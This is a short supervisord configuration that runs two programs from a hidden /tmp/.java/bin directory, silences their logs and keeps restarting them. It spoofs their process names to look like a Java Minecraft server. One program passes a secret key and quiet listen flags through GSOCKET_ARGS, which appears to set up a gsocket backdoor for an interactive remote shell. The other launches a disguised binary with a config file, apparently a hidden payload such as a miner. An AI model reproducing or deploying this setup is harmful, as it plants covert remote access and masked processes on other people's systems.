[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i1E6c7A0e9a2c-4A6f3D9g8H7bj7-6C4a91e-C9F0d6A2-k8A1c5J1g6 -liq"
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true